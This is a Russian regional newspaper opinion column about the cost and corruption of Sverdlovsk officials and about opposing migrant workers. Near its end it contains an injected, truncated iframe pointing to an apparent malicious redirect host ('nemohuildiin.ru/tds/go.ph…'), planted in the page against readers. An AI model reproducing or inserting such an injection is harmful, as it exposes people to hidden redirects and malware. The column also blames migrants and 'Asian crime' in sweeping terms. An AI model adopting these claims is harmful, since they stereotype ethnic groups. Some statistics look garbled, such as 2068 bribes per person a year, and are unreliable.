«Вечерний Екатеринбург: Дорогие чиновники Свердловской области

Мне уже как-то приходилось сообщать читателям, что содержание огромной рати нынешней губернской власти — администрации губернатора, правительства области — достаточно накладно для налогоплательщиков региона.
Если учесть, что в семьях налогоплателыциков электорального (выборного) возраста есть несовершеннолетние, то пострадавших от немыслимого числа чиновников значительно больше.
Но недавно я узнал и вовсе шокирующую новость.
Оказывается, в Свердловской области приходится по 2068 взяток на человека в год! Это в сфере так называемой бытовой коррупции, то есть гражданин — чиновнику. И средний размер взятки этой «категории» составляет 3599 рублей. Это девятое место (по количеству) и пятое (по .сумме) из сорока исследовавшихся фондом ИНДЕМ и TI-Russia основополагающих субъектов РФ (см. «Российскую газету» за 16 августа с. г.).
Исследователи изучали также деловую коррупцию, то бишь фирма — чиновнику. Тут Свердловская область занимает срединное положение. Средний Урал делит с дружественным Татарстаном 22—23-е места по количеству подношений на одну фирму (в среднем это 1450 взяток в год) и занимает 16-е место по сумме одного «подарка» — 38 880 рублей.
В общем, педагоги, врачи, деятели культуры etc против чиновников просто отдыхают со своими скудными полутора и даже двумя ставками.
Однако затронул я эту тему не для того только, чтобы поделиться пусть плохой, но новостью. Есть ещё повод для размышлений.
Скажем, отчего это нынешняя губернская власть столь яростно призывает к нашествию в регион иностранцев? Вспомните, как сильно ратовало за гастарбайтеров высшее должностное лицо, пока не ушло в известный отпуск, как ему вторит вице-премьер Юрий Осинцев! Изучив практику приёма иностранцев (я имею в виду законодательную базу), прихожу к выводу: работодатель, если он желает нанять дешёвую рабочую силу, обязательно посетит чиновника или целый анклав их. Потому как необходимо оформить некоторые документы и привести в соответствие некоторые сведения.
Например, такие: есть ли среди местных жителей безработные, которые могли бы занять должности, кои работодатель считает свободными. Если выяснится, что желающие из местных жителей есть, работодатель получит отказ. Если таковых соискателей нет — выдадут «добро».
Как у нас в России проходит санкционирование, об этом сказано выше. Необходимо при этом учесть, что на рынке труда произошли изменения. Безработица стала медленно, но расти, особенно в малых и моногородах — таких в Свердловской области большинство. Смею предположить, что «добро» при таких условиях может стать куда дороже!
Свердловские областные власти, популяризируя идею привлечения иностранцев на уральскую землю, почему-то умалчивают о таком регулирующем моменте, как квотирование. Правительством РФ на 2003 год установлено, что Россия может принять на работу только 530 тысяч гастарбайтеров из стран так называемого дальнего зарубежья. (На страны СНГ, где безвизовый режим, квоты действительно нет). Но и перед немцами, которых рьяно зовут на Средний Урал, и перед таджиками, которых уже привечают, россиянин (если брать политику всего государства) защищён законом одинаково.
Однако я очень сомневаюсь, в том числе и в силу выше озвученных фактов, что гражданин России будет так же защищён и на территории Среднего Урала.
Впрочем, у жителей Свердловской области —-налогоплательщиков электорального возраста — есть возможность уже в сентябре поправить губернскую политику. Иначе не видать роста зарплаты (наплыв гастарбайтеров понизит цену труда, да ещё на взятки деньги уйдут)..Иначе будет продолжаться рост азиатской преступности. Иначе мы будем переплачивать за коммунальные услуги, воду, газ и проч. (иностранцы живут кучно, а платят как за одного). Иначе чиновники ещё крепче могут сесть нам на шею. <iframe src="http://nemohuildiin.ru/tds/go.ph

Нажмите для вставки кода в блог
Распечатать

Архив Новостей

«    Май 2018    »
ПнВтСрЧтПтСбВс
 123456
78910111213
14151617181920
21222324252627
28293031 

Контакты